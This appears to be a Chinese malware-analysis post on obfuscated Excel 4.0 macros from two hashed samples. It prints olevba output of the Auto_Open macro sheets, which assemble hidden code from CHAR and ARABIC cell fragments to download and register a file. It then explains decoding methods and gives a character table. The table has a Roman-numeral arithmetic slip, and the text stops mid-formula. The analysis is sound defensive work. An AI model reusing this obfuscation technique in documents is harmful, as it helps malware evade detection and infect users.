背景介绍

工作遇到多个经过同样方式混淆并隐藏的宏代码，利用Excel表格特性，将数据分离在不同的单元格中，再使用Office自带的函数对单元格的数值进行提取后组合成代码字符串运行。完成了下载文件到本地并注册为服务的恶意行为。

宏代码

以下通过2个样本的宏代码简单描述一下恶意文档的执行方式，使用“oletools”的“olevba”提取宏代码如下：

🌰6EE99C20494D3876BEF6F882CA25DEE2🌰

olevba 0.60 on Python 3.10.1 - http://decalage.info/python/oletools
===============================================================================
FILE: Payment Status, United Kingdom.xls.6EE99C20494D3876BEF6F882CA25DEE2
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO xlm_macro.txt
in file: xlm_macro - OLE stream: 'xlm_macro'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' 0085     13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Shee
' 0085     13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden -  Rvfs
' 0085     13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden -  Rvfs
' 0085     13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden -  Rvfs
' 0085     12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden -  PFE
' 0085     12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - 
!
' 0085     12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - 
!
' 0018     29 LABEL : Cell Value, String Constant - _xlfn.ARABIC hidden len=2 ptgErr  *INCOMPLETE FORMULA PARSING* Remaining, unparsed expression: b'\x1d'
' 0018     27 LABEL : Cell Value, String Constant - UDYQ1 len=7 ptgRef3d  Shee!B7
' 0018     27 LABEL : Cell Value, String Constant - UDYQ2 len=7 ptgRef3d  Shee!B9
' 0018     27 LABEL : Cell Value, String Constant - UDYQ3 len=7 ptgRef3d  Shee!B11
' 0018     27 LABEL : Cell Value, String Constant - UDYQ4 len=7 ptgRef3d  Shee!B13
' 0018     27 LABEL : Cell Value, String Constant - UDYQ5 len=7 ptgRef3d  Shee!B15
' 0018     27 LABEL : Cell Value, String Constant - UDYQ6 len=7 ptgRef3d  Shee!B17
' 0018     27 LABEL : Cell Value, String Constant - UDYQ7 len=7 ptgRef3d  Shee!B19
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Shee!B1
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  Rvfs,E2,CHAR(113-2),""
'  Rvfs,G2,CHAR(111-6),""
'  Rvfs,L2,CHAR(71-6),""
'  Rvfs,C3,CHAR(111+3),""
'  Rvfs,I3,CHAR(87-4),""
'  Rvfs,P3,CHAR(90+2),""
'  Rvfs,F4,CHAR(100-18),""
'  Rvfs,H4,CHAR(110-9),""
'  Rvfs,K4,"",1.00000000000000000000
'  Rvfs,N4,CHAR(89-1),""
'  Rvfs,B5,CHAR(115+2),""
'  Rvfs,P5,CHAR(44+2),""
'  Rvfs,E6,CHAR(90-6),""
'  Rvfs,J6,CHAR(77-3),""
'  Rvfs,D7,CHAR(107+3),""
'  Rvfs,F7,"",3.00000000000000000000
'  Rvfs,M7,CHAR(117-2),""
'  Rvfs,P7,CHAR(41+3),""
'  Rvfs,C9,CHAR(110-2),""
'  Rvfs,H9,CHAR(70-3),""
'  Rvfs,K9,CHAR(55-7),""
'  Rvfs,P9,CHAR(55+5),""
'  Rvfs,F10,CHAR(123-4),""
'  Rvfs,E11,CHAR(80+5),""
'  Rvfs,J11,CHAR(80-7),""
'  Rvfs,L11,CHAR(100-1),""
'  Rvfs,P11,CHAR(35+5),""
'  Rvfs,A12,CHAR(107+2),""
'  Rvfs,D13,CHAR(72-4),""
'  Rvfs,H13,CHAR(68+1),""
'  Rvfs,N13,"",2.00000000000000000000
'  Rvfs,P13,CHAR(36+5),""
'  Rvfs,G14,CHAR(124-4),""
'  Rvfs,K14,CHAR(70-4),""
'  Rvfs,B15,CHAR(80-4),""
'  Rvfs,F15,CHAR(105-5),""
'  Rvfs,P15,CHAR(31+3),""
'  Rvfs,D17,CHAR(102-5),""
'  Rvfs,I17,CHAR(78+1),""
'  Rvfs,P17,CHAR(40-2),""
'  Rvfs,B18,CHAR(65+5),""
'  Rvfs,P19,CHAR(32),""
'  Rvfs,H20,"",8.00000000000000000000
'  Rvfs,P20,CHAR(52+6),""
'  Rvfs,P22,CHAR(66-5),""
'  Rvfs,K23,CHAR(80-2),""
'  Rvfs,G24,CHAR(84-2),""
'  Rvfs,I26,CHAR(84),""
'  Rvfs,I32,_xlfn.ARABIC("CXI"),""
'  Rvfs,O33,_xlfn.ARABIC("LXVII"),""
'  Rvfs,E35,_xlfn.ARABIC("LXI"),""
'  Rvfs,Q36,_xlfn.ARABIC("CXIV"),""
'  Rvfs,K37,_xlfn.ARABIC("CI"),""
'  Rvfs,E3,T( Rvfs!D13& Rvfs!E2& Rvfs!F10& Rvfs!D7& Rvfs!C9& Rvfs!E2& Rvfs!D17& Rvfs!F15& Rvfs!E6& Rvfs!E2& Rvfs!B18& Rvfs!G2& Rvfs!C9),""
'  Rvfs,G5,T( Rvfs!P15& Rvfs!P7& Rvfs!P15& Rvfs!J6& Rvfs!J6& Rvfs!H9& Rvfs!H9& Rvfs!K14& Rvfs!K14& Rvfs!P15),""
'  Rvfs,C7,T( Rvfs!P11& Rvfs!P15& Rvfs!B5& Rvfs!C3& Rvfs!C9),""
'  Rvfs,I9,T( Rvfs!P7& Rvfs!K9& Rvfs!P7),""
'  Rvfs,D11,T( Rvfs!A12& Rvfs!E2& Rvfs!D7& Rvfs!P15& Rvfs!P7& Rvfs!P15& Rvfs!E11& Rvfs!F4& Rvfs!B15),""
'  Rvfs,N4,T( Rvfs!P9& Rvfs!K9& Rvfs!P7& Rvfs!P19),""
'  Rvfs,B5,T( Rvfs!P19& Rvfs!P5& Rvfs!P5& Rvfs!P3& Rvfs!D17& Rvfs!F15& Rvfs!F10& Rvfs!P5& Rvfs!F15& Rvfs!C9& Rvfs!C9),""
'  Rvfs,P8,T( Rvfs!P19& Rvfs!P2& Rvfs!M7),""
'  Rvfs,N14,T( Rvfs!P5& Rvfs!P5& Rvfs!P3& Rvfs!D17& Rvfs!F15& Rvfs!F10& Rvfs!P5& Rvfs!F15& Rvfs!C9& Rvfs!C9),""
'  Rvfs,E16,T( Rvfs!P15& Rvfs!P7& Rvfs!K9& Rvfs!P7& Rvfs!K9& Rvfs!P13),""
'  PFE,B5,"FORMULA( Rvfs!C15, Rvfs!F3)=FORMULA( Rvfs!P22& Rvfs!H9& Rvfs!L2& Rvfs!B15& Rvfs!B15& PFE!C7& PFE!D11& PFE!E3& Rvfs!F3& Rvfs!L2& PFE!G5& PFE!I9& PFE!F19&
!!N14&
!!E16,B7)=FORMULA( Rvfs!P22& Rvfs!J11& Rvfs!B18& Rvfs!P11&"UDYQ1"&
!!N4& Rvfs!H9& Rvfs!L2& Rvfs!B15& Rvfs!B15& PFE!C7& PFE!D11& PFE!E3& Rvfs!F3& Rvfs!L2& PFE!G5& PFE!I9& PFE!G21&
!!N14&
!!E16& Rvfs!P13,B9)=FORMULA( Rvfs!P22& Rvfs!J11& Rvfs!B18& Rvfs!P11&"UDYQ2"&
!!N4& Rvfs!H9& Rvfs!L2& Rvfs!B15& Rvfs!B15& PFE!C7& PFE!D11& PFE!E3& Rvfs!F3& Rvfs!L2& PFE!G5& PFE!I9& PFE!H19&
!!N14&
!!E16& Rvfs!P13,B11)=FORMULA( Rvfs!P22& Rvfs!J11& Rvfs!B18& Rvfs!P11&"UDYQ3"&
!!N4& Rvfs!H9& Rvfs!L2& Rvfs!B15& Rvfs!B15& PFE!C7& PFE!D11& PFE!E3& Rvfs!F3& Rvfs!L2& PFE!G5& PFE!I9& PFE!I21&
!!N14&
!!E16& Rvfs!P13,B13)=FORMULA( Rvfs!P22& Rvfs!J11& Rvfs!B18& Rvfs!P11&"UDYQ4"&
!!N4& Rvfs!H9& Rvfs!L2& Rvfs!B15& Rvfs!B15& PFE!C7& PFE!D11& PFE!E3& Rvfs!F3& Rvfs!L2& PFE!G5& PFE!I9& PFE!J19&
!!N14&
!!E16& Rvfs!P13,B15)=FORMULA( Rvfs!P22& Rvfs!J11& Rvfs!B18& Rvfs!P11&"UDYQ5"&
!!N4& Rvfs!H9& Rvfs!L2& Rvfs!B15& Rvfs!B15& PFE!C7& PFE!D11& PFE!E3& Rvfs!F3& Rvfs!L2& PFE!G5& PFE!I9& PFE!K21&
!!N14&
!!E16& Rvfs!P13,B17)=FORMULA( Rvfs!P22& Rvfs!J11& Rvfs!B18& Rvfs!P11&"UDYQ6"&
!!N4& Rvfs!H9& Rvfs!B15& Rvfs!I17& Rvfs!I3& Rvfs!H13& Rvfs!P11& Rvfs!K9& Rvfs!P13& Rvfs!P7& Rvfs!P13,B21)=FORMULA( Rvfs!P22& Rvfs!H13& Rvfs!N4& Rvfs!H13& Rvfs!H9& Rvfs!P11& Rvfs!P15& Rvfs!H9& Rvfs!P20&
!!D3&
!!J6&
!!F11&
!!P8&
!!B5& Rvfs!P15& Rvfs!P13,B23)=FORMULA( Rvfs!P22&
!!R6& Rvfs!P11& Rvfs!P13,B28)",""
' 
!,C15,CHAR( Rvfs!K37),""
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|AutoExec  |Auto_Open           |Runs when the Excel Workbook is opened       |
|Suspicious|Hex Strings         |Hex-encoded strings were detected, may be    |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
|Suspicious|Base64 Strings      |Base64-encoded strings were detected, may be |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
|Suspicious|XLM macro           |XLM macro found. It may contain malicious    |
|          |                    |code                                         |
+----------+--------------------+---------------------------------------------+

🌰FBE4106C4303401DF89F6CFF0B1DBABC🌰

olevba 0.60 on Python 3.10.1 - http://decalage.info/python/oletools
===============================================================================
FILE: 20220325_006099_005.xls.FBE4106C4303401DF89F6CFF0B1DBABC
Type: OLE
WARNING  invalid value for PROJECTLCID_Id expected 0002 got 004A
WARNING  invalid value for PROJECTLCID_Lcid expected 0409 got 0002
WARNING  invalid value for PROJECTLCIDINVOKE_Id expected 0014 got 0002
WARNING  invalid value for PROJECTCODEPAGE_Id expected 0003 got 0014
WARNING  invalid value for PROJECTCODEPAGE_Size expected 0002 got 0004
WARNING  invalid value for PROJECTNAME_Id expected 0004 got 0000
ERROR    PROJECTNAME_SizeOfProjectName value not in range [1-128]: 131075
ERROR    Error in _extract_vba
Traceback (most recent call last):
  File "D:\DEV\Python\Python310\lib\site-packages\oletools\olevba.py", line 3544, in extract_macros
    for stream_path, vba_filename, vba_code in \
  File "D:\DEV\Python\Python310\lib\site-packages\oletools\olevba.py", line 2112, in _extract_vba
    project = VBA_Project(ole, vba_root, project_path, dir_path, relaxed)
  File "D:\DEV\Python\Python310\lib\site-packages\oletools\olevba.py", line 1770, in __init__
    projectdocstring_id = struct.unpack("<H", dir_stream.read(2))[0]
struct.error: unpack requires a buffer of 2 bytes
-------------------------------------------------------------------------------
VBA MACRO Лист1
in file: 20220325_006099_005.xls.FBE4106C4303401DF89F6CFF0B1DBABC - OLE stream: 'Лист1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Private Sub Image1_BeforeDragOver(ByVal Cancel As MSForms.ReturnBoolean, ByVal Data As MSForms.DataObject, ByVal X As Single, ByVal Y As Single, ByVal DragState As MSForms.fmDragState, ByVal Effect As MSForms.ReturnEffect, ByVal Shift As Integer)
End Sub
-------------------------------------------------------------------------------
VBA MACRO Лист2
in file: 20220325_006099_005.xls.FBE4106C4303401DF89F6CFF0B1DBABC - OLE stream: 'Лист2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Лист3
in file: 20220325_006099_005.xls.FBE4106C4303401DF89F6CFF0B1DBABC - OLE stream: 'Лист3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Лист4
in file: 20220325_006099_005.xls.FBE4106C4303401DF89F6CFF0B1DBABC - OLE stream: 'Лист4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO ЭтаКнига
in file: 20220325_006099_005.xls.FBE4106C4303401DF89F6CFF0B1DBABC - OLE stream: 'ЭтаКнига'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO xlm_macro.txt
in file: xlm_macro - OLE stream: 'xlm_macro'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' 0085     13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Shee
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden -  Vesfv
' 0085     13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden -  Ufbd
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden -  Pdvse
' 0085     11 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden -  DD
' 0085     15 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden -  PKEBEB
' 0018     29 LABEL : Cell Value, String Constant - _xlfn.ARABIC hidden len=2 ptgErr  *INCOMPLETE FORMULA PARSING* Remaining, unparsed expression: b'\x1d'
' 0018     25 LABEL : Cell Value, String Constant - DFD len=7 ptgRef3d  Ufbd!C7
' 0018     27 LABEL : Cell Value, String Constant - GRDS1 len=7 ptgRef3d  Vesfv!E11
' 0018     27 LABEL : Cell Value, String Constant - GRDS2 len=7 ptgRef3d  Vesfv!E13
' 0018     27 LABEL : Cell Value, String Constant - GRDS3 len=7 ptgRef3d  Vesfv!E15
' 0018     27 LABEL : Cell Value, String Constant - GRDS4 len=7 ptgRef3d  Vesfv!E17
' 0018     27 LABEL : Cell Value, String Constant - GRDS5 len=7 ptgRef3d  Vesfv!E19
' 0018     27 LABEL : Cell Value, String Constant - GRDS6 len=7 ptgRef3d  Vesfv!E21
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Vesfv!E1
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  Vesfv,E2,CHAR(113-2),""
'  Vesfv,G2,CHAR(111-6),""
'  Vesfv,L2,CHAR(71-6),""
'  Vesfv,C3,CHAR(111+3),""
'  Vesfv,I3,CHAR(87-4),""
'  Vesfv,P3,CHAR(90+2),""
'  Vesfv,F4,CHAR(100-18),""
'  Vesfv,H4,CHAR(110-9),""
'  Vesfv,K4,"",1.00000000000000000000
'  Vesfv,N4,CHAR(89-1),""
'  Vesfv,B5,CHAR(115+2),""
'  Vesfv,P5,CHAR(44+2),""
'  Vesfv,E6,CHAR(90-6),""
'  Vesfv,J6,CHAR(77-3),""
'  Vesfv,D7,CHAR(107+3),""
'  Vesfv,F7,"",3.00000000000000000000
'  Vesfv,M7,CHAR(117-2),""
'  Vesfv,P7,CHAR(41+3),""
'  Vesfv,C9,CHAR(110-2),""
'  Vesfv,H9,CHAR(70-3),""
'  Vesfv,K9,CHAR(55-7),""
'  Vesfv,P9,CHAR(55+5),""
'  Vesfv,F10,CHAR(123-4),""
'  Vesfv,E11,CHAR(80+5),""
'  Vesfv,J11,CHAR(80-7),""
'  Vesfv,L11,CHAR(100-1),""
'  Vesfv,P11,CHAR(35+5),""
'  Vesfv,A12,CHAR(107+2),""
'  Vesfv,D13,CHAR(72-4),""
'  Vesfv,H13,CHAR(68+1),""
'  Vesfv,N13,"",2.00000000000000000000
'  Vesfv,P13,CHAR(36+5),""
'  Vesfv,G14,CHAR(124-4),""
'  Vesfv,K14,CHAR(70-4),""
'  Vesfv,B15,CHAR(80-4),""
'  Vesfv,F15,CHAR(105-5),""
'  Vesfv,P15,CHAR(31+3),""
'  Vesfv,D17,CHAR(102-5),""
'  Vesfv,I17,CHAR(78+1),""
'  Vesfv,P17,CHAR(40-2),""
'  Vesfv,B18,CHAR(65+5),""
'  Vesfv,P19,CHAR(32),""
'  Vesfv,H20,"",8.00000000000000000000
'  Vesfv,P20,CHAR(52+6),""
'  Vesfv,P22,CHAR(66-5),""
'  Vesfv,K23,CHAR(80-2),""
'  Vesfv,G24,CHAR(84-2),""
'  Vesfv,I26,CHAR(84),""
'  Vesfv,I32,_xlfn.ARABIC("CXI"),""
'  Vesfv,O33,_xlfn.ARABIC("LXVII"),""
'  Vesfv,E35,_xlfn.ARABIC("LXI"),""
'  Vesfv,Q36,_xlfn.ARABIC("CXIV"),""
'  Vesfv,K37,_xlfn.ARABIC("CI"),""
'  Ufbd,D5,T( Shee!P11& Shee!P15& Shee!B5& Shee!C3& Shee!C9& Shee!A12),""
'  Ufbd,N6,T( Shee!E2& Shee!D17& Shee!F15& Shee!E6& Shee!E2& Shee!B18& Shee!G2& Shee!C9),""
'  Ufbd,F11,T( Shee!E2& Shee!D7& Shee!P15& Shee!P7& Shee!P15& Shee!E11& Shee!F4& Shee!B15& Shee!D13),""
'  Ufbd,P14,T( Shee!L2& Shee!P15& Shee!P7& Shee!P15& Shee!J6& Shee!J6& Shee!H9& Shee!H9& Shee!K14& Shee!K14& Shee!P15),""
'  Ufbd,Q23,T( Shee!P2& Shee!M7),""
'  Pdvse,E15,T( Shee!P19& Shee!P5& Shee!P5& Shee!P3& Shee!L11& Shee!M7& Shee!H4& Shee!G2& Shee!P5),""
'  Pdvse,E23,T( Shee!E2& Shee!F10& Shee!D7& Shee!C9),""
'  Pdvse,R24,T( Shee!P5& Shee!P5& Shee!P3& Shee!L11& Shee!M7& Shee!H4& Shee!G2& Shee!P5),""
'  DD,D10,"CONCATENATE( Shee!F15, Shee!C9, Shee!C9, Shee!P15)",""
'  PKEBEB,E9,"FORMULA( Shee!P22& Shee!H9& Shee!L2& Shee!B15& Shee!B15& Pdvse!D5& Pdvse!F11& DD!E23& Pdvse!N6& Shee!H4& Pdvse!P14& DD!L19& Pdvse!E17& DD!R24& PKEBEB!D10& DD!H18,E11)=FORMULA( Shee!P22& Shee!J11& Shee!B18& Shee!P11&"GRDS1"& DD!S7& Shee!H9& Shee!L2& Shee!B15& Shee!B15& Pdvse!D5& Pdvse!F11& DD!E23& Pdvse!N6& Shee!H4& Pdvse!P14& DD!L19& Pdvse!E19& DD!R24& PKEBEB!D10& DD!H18& Shee!P13,E13)=FORMULA( Shee!P22& Shee!J11& Shee!B18& Shee!P11&"GRDS2"& DD!S7& Shee!H9& Shee!L2& Shee!B15& Shee!B15& Pdvse!D5& Pdvse!F11& DD!E23& Pdvse!N6& Shee!H4& Pdvse!P14& DD!L19& Pdvse!G17& DD!R24& PKEBEB!D10& DD!H18& Shee!P13,E15)=FORMULA( Shee!P22& Shee!J11& Shee!B18& Shee!P11&"GRDS3"& DD!S7& Shee!H9& Shee!L2& Shee!B15& Shee!B15& Pdvse!D5& Pdvse!F11& DD!E23& Pdvse!N6& Shee!H4& Pdvse!P14& DD!L19& Pdvse!G19& DD!R24& PKEBEB!D10& DD!H18& Shee!P13,E17)=FORMULA( Shee!P22& Shee!J11& Shee!B18& Shee!P11&"GRDS4"& DD!S7& Shee!H9& Shee!L2& Shee!B15& Shee!B15& Pdvse!D5& Pdvse!F11& DD!E23& Pdvse!N6& Shee!H4& Pdvse!P14& DD!L19& Pdvse!I17& DD!R24& PKEBEB!D10& DD!H18& Shee!P13,E19)=FORMULA( Shee!P22& Shee!J11& Shee!B18& Shee!P11&"GRDS5"& DD!S7& Shee!H9& Shee!L2& Shee!B15& Shee!B15& Pdvse!D5& Pdvse!F11& DD!E23& Pdvse!N6& Shee!H4& Pdvse!P14& DD!L19& Pdvse!I19& DD!R24& PKEBEB!D10& DD!H18& Shee!P13,E21)=FORMULA( Shee!P22& Shee!J11& Shee!B18& Shee!P11&"GRDS6"& DD!S7& Shee!H9& Shee!B15& Shee!I17& Shee!I3& Shee!H13& Shee!P11& Shee!K9& Shee!P13& Shee!P7& Shee!P13,E23)=FORMULA( Shee!P22& Shee!H13& Shee!N4& Shee!H13& Shee!H9& Shee!P11& Shee!P15& Shee!H9& Shee!P20& DD!O14& DD!P10& DD!K6& Shee!P19& Pdvse!Q23& DD!E15& PKEBEB!D10& Shee!P13,E25)=FORMULA( Shee!P22& Shee!G41& Shee!P11& Shee!P13,E27)",""
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|AutoExec  |Auto_Open           |Runs when the Excel Workbook is opened       |
|Suspicious|Hex Strings         |Hex-encoded strings were detected, may be    |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
|Suspicious|Base64 Strings      |Base64-encoded strings were detected, may be |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
|Suspicious|XLM macro           |XLM macro found. It may contain malicious    |
|          |                    |code                                         |
+----------+--------------------+---------------------------------------------+

注意

本文仅从Python批量处理，规避检测和反规避、提取C2等方向入手考虑，不做调试等考虑，对样本分析并没有任何指导性。有需要请移步《Emotet - 基于Excel4.0隐藏表格和宏代码》。

还原字符串

常见：CHAR(简单加减法)

如：CHAR(84)

处理方式

Python

1. 正则提取“CHAR([0-9]+-)”

2. chr([1提取到的值])

   EXCEL（建议）

   “=CHAR（原始数据）”直接可以查看：
   

   常见：T函数返回文本

   返回值引用的文本。

   不常见：ARABIC(以字符串保存的罗马数字)

   处理方式

   Python

3. 正则提取“ARABIC(“字符串”)”

4. 实现罗马数字与ASCII码互转（参考：整数与罗马数字相互转换（转为十进制整数后再转ASCII））

   EXCEL（需要原生Office）

   把“ARABIC(“字符串”)”提取出来，加上“=”，组合成“=ARABIC（原始数据）”：
   
   注意：WPS没有ARABIC函数（焯）
   最后，还好也不多，直接手算了🧮🧮🧮😅😅😅

   不常见：FORMULA公式

   将拼接的字符串赋值保存到某单元格。

   还原后

   单个字符

   “6EE99C20494D3876BEF6F882CA25DEE2”和“FBE4106C4303401DF89F6CFF0B1DBABC”的单个字符都一样，估计是生成器没有每次刷新的原因。
   类似活字印刷术，每个格子里是一个值（相同），只是组合这些格子的公式（不同）。

   E2    =CHAR(113-2)
   G2    =CHAR(111-6)
   L2    =CHAR(71-6)
   C3    =CHAR(111+3)
   I3    =CHAR(87-4)
   P3    =CHAR(90+2)
   F4    =CHAR(100-18)
   H4    =CHAR(110-9)
   K4    =1
   N4    =CHAR(89-1)
   B5    =CHAR(115+2)
   P5    =CHAR(44+2)
   E6    =CHAR(90-6)
   J6    =CHAR(77-3)
   D7    =CHAR(107+3)
   F7    =3
   M7    =CHAR(117-2)
   P7    =CHAR(41+3)
   C9    =CHAR(110-2)
   H9    =CHAR(70-3)
   K9    =CHAR(55-7)
   P9    =CHAR(55+5)
   F10    =CHAR(123-4)
   E11    =CHAR(80+5)
   J11    =CHAR(80-7)
   L11    =CHAR(100-1)
   P11    =CHAR(35+5)
   A12    =CHAR(107+2)
   D13    =CHAR(72-4)
   H13    =CHAR(68+1)
   N13    =2
   P13    =CHAR(36+5)
   G14    =CHAR(124-4)
   K14    =CHAR(70-4)
   B15    =CHAR(80-4)
   F15    =CHAR(105-5)
   P15    =CHAR(31+3)
   D17    =CHAR(102-5)
   I17    =CHAR(78+1)
   P17    =CHAR(40-2)
   B18    =CHAR(65+5)
   P19    =CHAR(32)
   H20    =8
   P20    =CHAR(52+6)
   P22    =CHAR(66-5)
   K23    =CHAR(80-2)
   G24    =CHAR(84-2)
   I26    =CHAR(84)
   I32    =ARABIC("CXI")
   O33    =ARABIC("LXVII")
   E35    =ARABIC("LXI")
   Q36    =ARABIC("CXIV")
   K37    =ARABIC("CI")

   计算

   CHAR

   

   ARABIC

   先将罗马数字转为阿拉伯数字：
   
   （WPS不兼容“=_xlfn.ARABIC”）
   再用CHAR(阿拉伯数字)：
   

   表格

   | 单元格 | 计算公式 | 罗马数字 | 阿拉伯数字 | 字符串 | | —- | —- | —- | —- | —- | | E2 | =CHAR(113-2) | | | o | | G2 | =CHAR(111-6) | | | i | | L2 | =CHAR(71-6) | | | A | | C3 | =CHAR(111+3) | | | r | | I3 | =CHAR(87-4) | | | S | | P3 | =CHAR(90+2) | | | \ | | F4 | =CHAR(100-18) | | | R | | H4 | =CHAR(110-9) | | | e | | K4 | =1 | | | 1 | | N4 | =CHAR(89-1) | | | X | | B5 | =CHAR(115+2) | | | u | | P5 | =CHAR(44+2) | | | . | | E6 | =CHAR(90-6) | | | T | | J6 | =CHAR(77-3) | | | J | | D7 | =CHAR(107+3) | | | n | | F7 | =3 | | | 3 | | M7 | =CHAR(117-2) | | | s | | P7 | =CHAR(41+3) | | | , | | C9 | =CHAR(110-2) | | | l | | H9 | =CHAR(70-3) | | | C | | K9 | =CHAR(55-7) | | | 0 | | P9 | =CHAR(55+5) | | | < | | F10 | =CHAR(123-4) | | | w | | E11 | =CHAR(80+5) | | | U | | J11 | =CHAR(80-7) | | | I | | L11 | =CHAR(100-1) | | | c | | P11 | =CHAR(35+5) | | | ( | | A12 | =CHAR(107+2) | | | m | | D13 | =CHAR(72-4) | | | D | | H13 | =CHAR(68+1) | | | E | | N13 | =2 | | | 2 | | P13 | =CHAR(36+5) | | | ) | | G14 | =CHAR(124-4) | | | x | | K14 | =CHAR(70-4) | | | B | | B15 | =CHAR(80-4) | | | L | | F15 | =CHAR(105-5) | | | d | | P15 | =CHAR(31+3) | | | “ | | D17 | =CHAR(102-5) | | | a | | I17 | =CHAR(78+1) | | | O | | P17 | =CHAR(40-2) | | | & | | B18 | =CHAR(65+5) | | | F | | P19 | =CHAR(32) | | | | | H20 | =8 | | | 8 | | P20 | =CHAR(52+6) | | | : | | P22 | =CHAR(66-5) | | | = | | K23 | =CHAR(80-2) | | | N | | G24 | =CHAR(84-2) | | | R | | I26 | =CHAR(84) | | | T | | I32 | =ARABIC(“CXI”) | CXI | =100+10+1 | o | | O33 | =ARABIC(“LXVII”) | LXVII | =50+10+5+2 | C | | E35 | =ARABIC(“LXI”) | LXI | =50+10+1 | = | | Q36 | =ARABIC(“CXIV”) | CXIV | =100+10+1+5 | t | | K37 | =ARABIC(“CI”) | CI | =100+1 | e |

代码

6EE99C20494D3876BEF6F882CA25DEE2

T函数将字符拼接成句子：

FORMULA( Rvfs!C15, Rvfs!F3)=FORMULA( Rvfs!P22& Rvfs!H9& Rvfs!L2& Rvfs!B15& Rvfs!B15& PFE!C7& PFE!D11& PFE!E3& Rvfs!F3& Rvfs!L2& PFE!G5& PFE!I9& PFE!F19&
!!N14&
!!E16,B7)=FORMULA( Rvfs!P22& Rvfs!J11& Rvfs!B18& Rvfs!P11&"UDYQ1"&
